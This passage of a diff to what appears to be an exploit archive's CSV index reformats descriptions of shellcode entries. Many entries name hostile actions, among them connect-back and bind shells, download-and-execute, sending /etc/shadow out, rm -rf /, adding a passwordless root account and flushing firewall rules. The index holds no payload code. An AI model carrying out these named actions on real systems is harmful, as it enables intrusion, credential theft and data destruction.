bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 13334,platforms/lin_x86/shellcode/13334.txt,"linux/x86 setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 -13335,platforms/lin_x86/shellcode/13335.c,"linux/x86 iopl(3); asm(cli); while(1){} 12 bytes",2008-09-17,dun,lin_x86,shellcode,0 -13336,platforms/lin_x86/shellcode/13336.c,"linux/x86 system-beep shellcode 45 bytes",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 +13335,platforms/lin_x86/shellcode/13335.c,"linux/x86 - iopl(3); asm(cli); while(1){} (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0 +13336,platforms/lin_x86/shellcode/13336.c,"linux/x86 - system-beep shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 13337,platforms/lin_x86/shellcode/13337.c,"linux/x86 connect back_ download a file and execute (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 13338,platforms/lin_x86/shellcode/13338.c,"linux/86 setreuid(geteuid_ geteuid) + execve(/bin/sh) shellcode",2008-08-19,Reth,lin_x86,shellcode,0 -13339,platforms/lin_x86/shellcode/13339.asm,"linux/x86 connect back.send.exit /etc/shadow 155 bytes",2008-08-18,0in,lin_x86,shellcode,0 -13340,platforms/lin_x86/shellcode/13340.c,"linux/x86 writes a php connectback shell to the fs 508 bytes",2008-08-18,GS2008,lin_x86,shellcode,0 -13341,platforms/lin_x86/shellcode/13341.c,"linux/x86 rm -rf / attempts to block the process from being stopped",2008-08-18,onionring,lin_x86,shellcode,0 -13342,platforms/lin_x86/shellcode/13342.c,"linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes",2008-08-18,LiquidWorm,lin_x86,shellcode,0 -13343,platforms/lin_x86/shellcode/13343.asm,"linux/x86 raw-socket ICMP/checksum shell 235 byte",2007-04-02,mu-b,lin_x86,shellcode,0 -13344,platforms/lin_x86/shellcode/13344.c,"linux/x86 /sbin/iptables -F 40 bytes",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 -13345,platforms/lin_x86/shellcode/13345.c,"linux/x86 kill all processes 11 bytes",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 +13339,platforms/lin_x86/shellcode/13339.asm,"linux/x86 - connect back.send.exit /etc/shadow (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 +13340,platforms/lin_x86/shellcode/13340.c,"linux/x86 - writes a php connectback shell to the fs (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 +13341,platforms/lin_x86/shellcode/13341.c,"linux/x86 - rm -rf / attempts to block the process from being stopped",2008-08-18,onionring,lin_x86,shellcode,0 +13342,platforms/lin_x86/shellcode/13342.c,"linux/x86 - setuid(0) . setgid(0) . aslr_off (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 +13343,platforms/lin_x86/shellcode/13343.asm,"linux/x86 - raw-socket ICMP/checksum shell (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0 +13344,platforms/lin_x86/shellcode/13344.c,"linux/x86 - /sbin/iptables -F (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 +13345,platforms/lin_x86/shellcode/13345.c,"linux/x86 - kill all processes (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 13346,platforms/lin_x86/shellcode/13346.s,"linux/x86 execve read shellcode - 92 bytes",2006-11-20,0ut0fbound,lin_x86,shellcode,0 -13347,platforms/lin_x86/shellcode/13347.c,"linux/x86 /sbin/ipchains -F 40 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13348,platforms/lin_x86/shellcode/13348.c,"linux/x86 set system time to 0 and exit 12 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13349,platforms/lin_x86/shellcode/13349.c,"linux/x86 add root user r00t with no password to /etc/passwd 69 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13350,platforms/lin_x86/shellcode/13350.c,"linux/x86 chmod 0666 /etc/shadow 36 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13351,platforms/lin_x86/shellcode/13351.c,"linux/x86 forkbomb 7 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13352,platforms/lin_x86/shellcode/13352.c,"linux/x86 execve(rm -rf /) shellcode 45 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13353,platforms/lin_x86/shellcode/13353.c,"linux/x86 setuid(0) + execve(/bin/sh) 28 bytes",2006-11-16,Revenge,lin_x86,shellcode,0 -13354,platforms/lin_x86/shellcode/13354.c,"linux/x86 execve(/bin/sh) 22 bytes",2006-11-16,Revenge,lin_x86,shellcode,0 +13347,platforms/lin_x86/shellcode/13347.c,"linux/x86 - /sbin/ipchains -F (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13348,platforms/lin_x86/shellcode/13348.c,"linux/x86 - set system time to 0 and exit (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13349,platforms/lin_x86/shellcode/13349.c,"linux/x86 - add root user r00t with no password to /etc/passwd (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13350,platforms/lin_x86/shellcode/13350.c,"linux/x86 - chmod 0666 /etc/shadow (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13351,platforms/lin_x86/shellcode/13351.c,"linux/x86 - forkbomb (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13352,platforms/lin_x86/shellcode/13352.c,"linux/x86 - execve(rm -rf /) shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13353,platforms/lin_x86/shellcode/13353.c,"linux/x86 - setuid(0) + execve(/bin/sh) (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 +13354,platforms/lin_x86/shellcode/13354.c,"linux/x86 - execve(/bin/sh) (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 13355,platforms/lin_x86/shellcode/13355.c,"linux/x86 HTTP/1.x GET_ Downloads and execve() (111 bytes+)",2006-10-22,izik,lin_x86,shellcode,0 13356,platforms/lin_x86/shellcode/13356.c,"linux/x86 executes command after setreuid (9 + 40 bytes + cmd)",2006-08-02,bunker,lin_x86,shellcode,0 13357,platforms/lin_x86/shellcode/13357.c,"linux/x86 stdin re-open and /bin/sh exec shellcode",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13358,platforms/lin_x86/shellcode/13358.c,"linux/x86 re-use of /bin/sh string in .rodata shellcode 16 bytes",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13359,platforms/lin_x86/shellcode/13359.c,"linux/x86 setuid(0) and /bin/sh execve() shellcode 30 bytes",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13360,platforms/lin_x86/shellcode/13360.c,"linux/x86 setuid/portbind shellcode 96 bytes",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13361,platforms/lin_x86/shellcode/13361.c,"linux/x86 portbind (define your own port) 84 bytes",2006-07-04,oveRet,lin_x86,shellcode,0 -13362,platforms/lin_x86/shellcode/13362.c,"linux/x86 execve() Diassembly Obfuscation Shellcode 32 bytes",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 -13363,platforms/lin_x86/shellcode/13363.c,"linux/x86 SET_PORT() portbind 100 bytes",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 -13364,platforms/lin_x86/shellcode/13364.c,"linux/x86 SET_IP() Connectback Shellcode 82 bytes",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 -13365,platforms/lin_x86/shellcode/13365.c,"linux/x86 execve(/bin/sh) 24 bytes",2006-05-01,hophet,lin_x86,shellcode,0 -13366,platforms/lin_x86/shellcode/13366.txt,"linux/x86 xor-encoded Connect Back Shellcode 371 bytes",2006-04-18,xort,lin_x86,shellcode,0 -13367,platforms/lin_x86/shellcode/13367.c,"linux/x86 execve(/bin/sh) + ZIP Header 28 bytes",2006-04-17,izik,lin_x86,shellcode,0 -13368,platforms/lin_x86/shellcode/13368.c,"linux/x86 execve(/bin/sh) + RTF Header 30 bytes",2006-04-17,izik,lin_x86,shellcode,0 -13369,platforms/lin_x86/shellcode/13369.c,"linux/x86 execve(/bin/sh) + RIFF Header 28 bytes",2006-04-17,izik,lin_x86,shellcode,0 -13370,platforms/lin_x86/shellcode/13370.c,"linux/x86 execve(/bin/sh) + Bitmap Header 27 bytes",2006-04-17,izik,lin_x86,shellcode,0 -13371,platforms/lin_x86/shellcode/13371.c,"linux/x86 SWAP restore shellcode 109 bytes",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 -13372,platforms/lin_x86/shellcode/13372.c,"linux/x86 SWAP store shellcode 99 bytes",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 -13373,platforms/lin_x86/shellcode/13373.c,"linux/x86 Password Authentication portbind Shellcode 166 bytes",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 -13374,platforms/lin_x86/shellcode/13374.c,"linux/x86 portbind (port 64713) 86 bytes",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 -13375,platforms/lin_x86/shellcode/13375.c,"linux/x86 execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13376,platforms/lin_x86/shellcode/13376.c,"linux/x86 execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13377,platforms/lin_x86/shellcode/13377.c,"linux/x86 setuid(0) + execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13358,platforms/lin_x86/shellcode/13358.c,"linux/x86 - re-use of /bin/sh string in .rodata shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13359,platforms/lin_x86/shellcode/13359.c,"linux/x86 - setuid(0) and /bin/sh execve() shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13360,platforms/lin_x86/shellcode/13360.c,"linux/x86 - setuid/portbind shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13361,platforms/lin_x86/shellcode/13361.c,"linux/x86 - portbind (define your own port) (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 +13362,platforms/lin_x86/shellcode/13362.c,"linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 +13363,platforms/lin_x86/shellcode/13363.c,"linux/x86 - SET_PORT() portbind (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13364,platforms/lin_x86/shellcode/13364.c,"linux/x86 - SET_IP() Connectback Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13365,platforms/lin_x86/shellcode/13365.c,"linux/x86 - execve(/bin/sh) (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 +13366,platforms/lin_x86/shellcode/13366.txt,"linux/x86 - xor-encoded Connect Back Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 +13367,platforms/lin_x86/shellcode/13367.c,"linux/x86 - execve(/bin/sh) + ZIP Header (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13368,platforms/lin_x86/shellcode/13368.c,"linux/x86 - execve(/bin/sh) + RTF Header (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13369,platforms/lin_x86/shellcode/13369.c,"linux/x86 - execve(/bin/sh) + RIFF Header (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13370,platforms/lin_x86/shellcode/13370.c,"linux/x86 - execve(/bin/sh) + Bitmap Header (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 +13371,platforms/lin_x86/shellcode/13371.c,"linux/x86 - SWAP restore shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 +13372,platforms/lin_x86/shellcode/13372.c,"linux/x86 - SWAP store shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 +13373,platforms/lin_x86/shellcode/13373.c,"linux/x86 Password Authentication portbind Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 +13374,platforms/lin_x86/shellcode/13374.c,"linux/x86 - portbind (port 64713) (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 +13375,platforms/lin_x86/shellcode/13375.c,"linux/x86 execve(_/bin/sh__ [_/bin/sh__ NULL]) (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13376,platforms/lin_x86/shellcode/13376.c,"linux/x86 execve(_/bin/sh__ [_/bin/sh__ NULL]) (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13377,platforms/lin_x86/shellcode/13377.c,"linux/x86 setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13378,platforms/lin_x86/shellcode/13378.c,"linux/x86 setuid(0)_setgid(0) execve(/bin/sh_ [/bin/sh_ NULL]) (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13379,platforms/lin_x86/shellcode/13379.c,"linux/x86 setreuid(0_0) execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13379,platforms/lin_x86/shellcode/13379.c,"linux/x86 setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"linux/x86 HTTP/1.x GET_ Downloads and JMP - (68 bytes+)",2006-03-12,izik,lin_x86,shellcode,0 -13381,platforms/lin_x86/shellcode/13381.c,"linux/x86 TCP Proxy Shellcode 236 bytes",2006-02-07,phar,lin_x86,shellcode,0 -13382,platforms/lin_x86/shellcode/13382.c,"linux/x86 execve /bin/sh anti-ids 40 bytes",2006-01-26,NicatiN,lin_x86,shellcode,0 -13383,platforms/lin_x86/shellcode/13383.c,"linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes",2006-01-25,izik,lin_x86,shellcode,0 -13384,platforms/lin_x86/shellcode/13384.c,"linux/x86 execve /bin/sh (encoded by +1) 39 bytes",2006-01-25,izik,lin_x86,shellcode,0 +13381,platforms/lin_x86/shellcode/13381.c,"linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 +13382,platforms/lin_x86/shellcode/13382.c,"linux/x86 -execve /bin/sh anti-ids (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 +13383,platforms/lin_x86/shellcode/13383.c,"linux/x86 - execve /bin/sh xored for Intel x86 CPUID (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 +13384,platforms/lin_x86/shellcode/13384.c,"linux/x86 - execve /bin/sh (encoded by +1) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13385,platforms/lin_x86/shellcode/13385.c,"linux/x86 Adduser without Password to /etc/passwd 59 bytes",2006-01-21,izik,lin_x86,shellcode,0 13386,platforms/lin_x86/shellcode/13386.c,"linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes",2006-01-21,izik,lin_x86,shellcode,0 13387,platforms/lin_x86/shellcode/13387.c,"linux/x86 Bind /bin/sh to 31337/tcp 80 bytes",2006-01-21,izik,lin_x86,shellcode,0 @@ -11885,7 +11885,7 @@ id,file,description,date,author,platform,type,port 13404,platforms/lin_x86/shellcode/13404.c,"linux/x86 if(read(fd_buf_512)<=2) _exit(1) else buf(); (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13405,platforms/lin_x86/shellcode/13405.c,"linux/x86 _exit(1); 7 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13406,platforms/lin_x86/shellcode/13406.c,"linux/x86 read(0_buf_2541); chmod(buf_4755); (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13407,platforms/lin_x86/shellcode/13407.c,"linux/x86 write(0_""Hello core!\n""_12); (with optional 7 byte exit) (36 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13407,platforms/lin_x86/shellcode/13407.c,"linux/x86 write(0__Hello core!\n__12); (with optional 7 byte exit) (36 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13408,platforms/lin_x86/shellcode/13408.c,"linux/x86 snoop /dev/dsp shellcode 172 bytes",2005-11-04,phar,lin_x86,shellcode,0 13409,platforms/lin_x86/shellcode/13409.c,"linux/x86 /bin/sh Standard Opcode Array Payload 21 Bytes",2005-09-15,c0ntex,lin_x86,shellcode,0 13410,platforms/lin_x86/shellcode/13410.s,"linux/x86 examples of long-term payloads hide-wait-change (.s)",2005-09-09,xort,lin_x86,shellcode,0 @@ -11901,7 +11901,7 @@ id,file,description,date,author,platform,type,port 13420,platforms/lin_x86/shellcode/13420.c,"linux/x86 Radically Self Modifying Code 70 bytes",2004-12-22,xort,lin_x86,shellcode,0 13421,platforms/lin_x86/shellcode/13421.c,"linux/x86 Magic Byte Self Modifying Code 76 bytes",2004-12-22,xort,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"linux/x86 execve code 23 bytes",2004-11-15,marcetam,lin_x86,shellcode,0 -13423,platforms/lin_x86/shellcode/13423.c,"linux/x86 execve(""/bin/ash""_0_0); (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 +13423,platforms/lin_x86/shellcode/13423.c,"linux/x86 execve(_/bin/ash__0_0); (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"linux/x86 execve /bin/sh alphanumeric 392 bytes",2004-09-26,RaiSe,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"linux/x86 execve /bin/sh IA32 0xff-less 45 bytes",2004-09-26,anathema,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"linux/x86 symlink /bin/sh xoring 56 bytes",2004-09-26,dev0id,lin_x86,shellcode,0 @@ -11911,15 +11911,15 @@ id,file,description,date,author,platform,type,port 13430,platforms/lin_x86/shellcode/13430.c,"linux/x86 symlink . /bin/sh 32 bytes",2004-09-26,dev0id,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"linux/x86 kill snort 151 bytes",2004-09-26,nob0dy,lin_x86,shellcode,0 13432,platforms/lin_x86/shellcode/13432.c,"linux/x86 shared memory exec 50 bytes",2004-09-26,sloth,lin_x86,shellcode,0 -13433,platforms/lin_x86/shellcode/13433.c,"linux/x86 iptables -F 45 bytes",2004-09-26,UnboundeD,lin_x86,shellcode,0 -13434,platforms/lin_x86/shellcode/13434.c,"linux/x86 iptables -F 58 bytes",2004-09-26,dev0id,lin_x86,shellcode,0 +13433,platforms/lin_x86/shellcode/13433.c,"linux/x86 iptables -F (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 +13434,platforms/lin_x86/shellcode/13434.c,"linux/x86 - iptables -F (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13435,platforms/lin_x86/shellcode/13435.c,"linux/x86 Reverse telnet 134 bytes",2004-09-26,hts,lin_x86,shellcode,0 13436,platforms/lin_x86/shellcode/13436.c,"linux/x86 connect 120 bytes",2004-09-26,lamagra,lin_x86,shellcode,0 13437,platforms/lin_x86/shellcode/13437.c,"linux/x86 chmod 666 /etc/shadow 41 bytes",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13438,platforms/lin_x86/shellcode/13438.c,"linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes",2004-09-26,RaiSe,lin_x86,shellcode,0 13439,platforms/lin_x86/shellcode/13439.c,"linux/x86 eject /dev/cdrom 64 bytes",2004-09-26,lamagra,lin_x86,shellcode,0 -13440,platforms/lin_x86/shellcode/13440.c,"linux/x86 xterm -ut -display [IP]:0 132 bytes",2004-09-26,RaiSe,lin_x86,shellcode,0 -13441,platforms/lin_x86/shellcode/13441.c,"linux/x86 ipchains -F 49 bytes",2004-09-26,Sp4rK,lin_x86,shellcode,0 +13440,platforms/lin_x86/shellcode/13440.c,"linux/x86 - xterm -ut -display [IP]:0 (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 +13441,platforms/lin_x86/shellcode/13441.c,"linux/x86 (ipchains -F (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0 13442,platforms/lin_x86/shellcode/13442.c,"linux/x86 chmod 666 /etc/shadow 82 bytes",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13443,platforms/lin_x86/shellcode/13443.c,"linux/x86 execve /bin/sh 29 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13444,platforms/lin_x86/shellcode/13444.c,"linux/x86 execve /bin/sh 24 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 @@ -11943,15 +11943,15 @@ id,file,description,date,author,platform,type,port 13462,platforms/lin_x86/shellcode/13462.c,"linux/x86 break chroot setuid(0) + /bin/sh 132 bytes",2000-08-07,N/A,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"linux/x86-64 bindshell port:4444 shellcode 132 bytes",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"linux/x86-64 execve(/bin/sh) 33 bytes",2006-11-02,hophet,lin_x86-64,shellcode,0 -13465,platforms/multiple/shellcode/13465.c,"linux/PPC/x86 execve(""/bin/sh""_{""/bin/sh""_NULL}_NULL) (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 -13466,platforms/multiple/shellcode/13466.c,"os-x/PPC/x86 execve(""/bin/sh""_{""/bin/sh""_NULL}_NULL) (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 +13465,platforms/multiple/shellcode/13465.c,"linux/PPC/x86 execve(_/bin/sh__{_/bin/sh__NULL}_NULL) (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 +13466,platforms/multiple/shellcode/13466.c,"os-x/PPC/x86 execve(_/bin/sh__{_/bin/sh__NULL}_NULL) (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 13467,platforms/multiple/shellcode/13467.c,"linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes",2004-09-12,dymitri,multiple,shellcode,0 13468,platforms/multiple/shellcode/13468.c,"linux/x86 unix/SPARC execve /bin/sh 80 bytes",2004-09-12,dymitri,multiple,shellcode,0 13469,platforms/multiple/shellcode/13469.c,"linux/x86 bsd/x86 execve /bin/sh 38 bytes",2004-09-12,dymitri,multiple,shellcode,0 13470,platforms/netbsd_x86/shellcode/13470.c,"netbsd/x86 kill all processes shellcode 23 bytes",2009-06-18,anonymous,netbsd_x86,shellcode,0 13471,platforms/netbsd_x86/shellcode/13471.c,"netbsd/x86 callback shellcode (port 6666) 83 bytes",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13472,platforms/netbsd_x86/shellcode/13472.c,"netbsd/x86 setreuid(0_ 0); execve(""/bin//sh""_ ..._ NULL); (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13473,platforms/netbsd_x86/shellcode/13473.c,"netbsd/x86 setreuid(0_ 0); execve(""/bin//sh""_ ..._ NULL); (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13472,platforms/netbsd_x86/shellcode/13472.c,"netbsd/x86 setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13473,platforms/netbsd_x86/shellcode/13473.c,"netbsd/x86 setreuid(0_ 0); execve(_/bin//sh__ ..._ NULL); (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13474,platforms/netbsd_x86/shellcode/13474.txt,"netbsd/x86 execve /bin/sh 68 bytes",2004-09-26,humble,netbsd_x86,shellcode,0 13475,platforms/openbsd_x86/shellcode/13475.c,"openbsd/x86 execve(/bin/sh) 23 bytes",2006-05-01,hophet,openbsd_x86,shellcode,0 13476,platforms/openbsd_x86/shellcode/13476.c,"openbsd/x86 portbind port 6969 148 bytes",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 @@ -11966,7 +11966,7 @@ id,file,description,date,author,platform,type,port 13485,platforms/osx_ppc/shellcode/13485.c,"os-x/PPC create /tmp/suid 122 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 13486,platforms/osx_ppc/shellcode/13486.c,"os-x/PPC simple write() 75 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 13487,platforms/osx_ppc/shellcode/13487.c,"os-x/PPC execve /usr/X11R6/bin/xterm 141 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13488,platforms/sco_x86/shellcode/13488.c,"sco/x86 execve(""/bin/sh""_ ..._ NULL); (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 +13488,platforms/sco_x86/shellcode/13488.c,"sco/x86 execve(_/bin/sh__ ..._ NULL); (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"solaris/sparc download and execute 278 bytes",2006-11-21,xort,solaris_sparc,shellcode,0 13490,platforms/solaris_sparc/shellcode/13490.c,"solaris/sparc executes command after setreuid (92 bytes + cmd)",2006-10-21,bunker,solaris_sparc,shellcode,0 13491,platforms/solaris_sparc/shellcode/13491.c,"solaris/sparc connect-back (with XNOR encoded session) 600 bytes",2006-07-21,xort,solaris_sparc,shellcode,0 @@ -12015,7 +12015,7 @@ id,file,description,date,author,platform,type,port 13532,platforms/win32/shellcode/13532.asm,"Microsoft Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,N/A,win32,shellcode,0 13533,platforms/win64/shellcode/13533.asm,"win64 (URLDownloadToFileA) download and execute 218+ bytes",2006-08-07,Weiss,win64,shellcode,0 13548,platforms/lin_x86/shellcode/13548.asm,"linux/x86 kill all processes 9 bytes",2010-01-14,root@thegibson,lin_x86,shellcode,0 -13549,platforms/lin_x86/shellcode/13549.c,"Linux - setuid(0) & execve(""/sbin/poweroff -f"")",2009-12-04,ka0x,lin_x86,shellcode,0 +13549,platforms/lin_x86/shellcode/13549.c,"Linux - setuid(0) & execve(_/sbin/poweroff -f_)",2009-12-04,ka0x,lin_x86,shellcode,0 13550,platforms/lin_x86/shellcode/13550.c,"Linux - setuid(0) and cat /etc/shadow",2009-12-04,ka0x,lin_x86,shellcode,0 13551,platforms/lin_x86/shellcode/13551.c,"Linux - chmod(/etc/shadow_ 0666) & exit() (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13553,platforms/lin_x86/shellcode/13553.c,"Linux - linux/x86 execve() - 51bytes",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 @@ -12032,9 +12032,9 @@ id,file,description,date,author,platform,type,port 13576,platforms/lin_x86/shellcode/13576.asm,"linux/x86 chmod 666 /etc/shadow 27 bytes",2010-01-16,root@thegibson,lin_x86,shellcode,0 13577,platforms/lin_x86/shellcode/13577.txt,"linux/x86 break chroot 79 bytes",2009-12-30,root@thegibson,lin_x86,shellcode,0 13578,platforms/lin_x86/shellcode/13578.txt,"linux/x86 fork bomb 6 bytes",2009-12-30,root@thegibson,lin_x86,shellcode,0 -13579,platforms/lin_x86/shellcode/13579.c,"linux/x86 append ""/etc/passwd"" & exit() 107 bytes",2009-12-31,sandman,lin_x86,shellcode,0 -13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro Sp2 English ""Message-Box"" Shellcode",2010-01-03,Aodrulez,windows,shellcode,0 -13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro Sp2 English ""Wordpad"" Shellcode",2010-01-03,Aodrulez,windows,shellcode,0 +13579,platforms/lin_x86/shellcode/13579.c,"linux/x86 append _/etc/passwd_ & exit() 107 bytes",2009-12-31,sandman,lin_x86,shellcode,0 +13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro Sp2 English _Message-Box_ Shellcode",2010-01-03,Aodrulez,windows,shellcode,0 +13582,platforms/windows/shellcode/13582.txt,"Windows XP Pro Sp2 English _Wordpad_ Shellcode",2010-01-03,Aodrulez,windows,shellcode,0 13586,platforms/lin_x86/shellcode/13586.txt,"linux/x86 eject /dev/cdrom 42 bytes",2010-01-08,root@thegibson,lin_x86,shellcode,0 13595,platforms/win32/shellcode/13595.c,"Win32 Shellcode XP SP2 FR (calc) 19 bytes",2010-01-20,SkuLL-HackeR,win32,shellcode,0 13599,platforms/lin_x86/shellcode/13599.txt,"Linux x86 - polymorphic shellcode ip6tables -F - 71 bytes",2010-01-24,"Jonathan Salwan",lin_x86,shellcode,0 @@ -12057,42 +12057,42 @@ id,file,description,date,author,platform,type,port 13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0 13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit module)",2010-03-24,corelanc0d3r,win32,shellcode,0 13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0 -13661,platforms/linux/shellcode/13661.txt,"linux x86 nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0 -13669,platforms/linux/shellcode/13669.c,"chmod(""/etc/shadow""_ 0666) shellcode (36 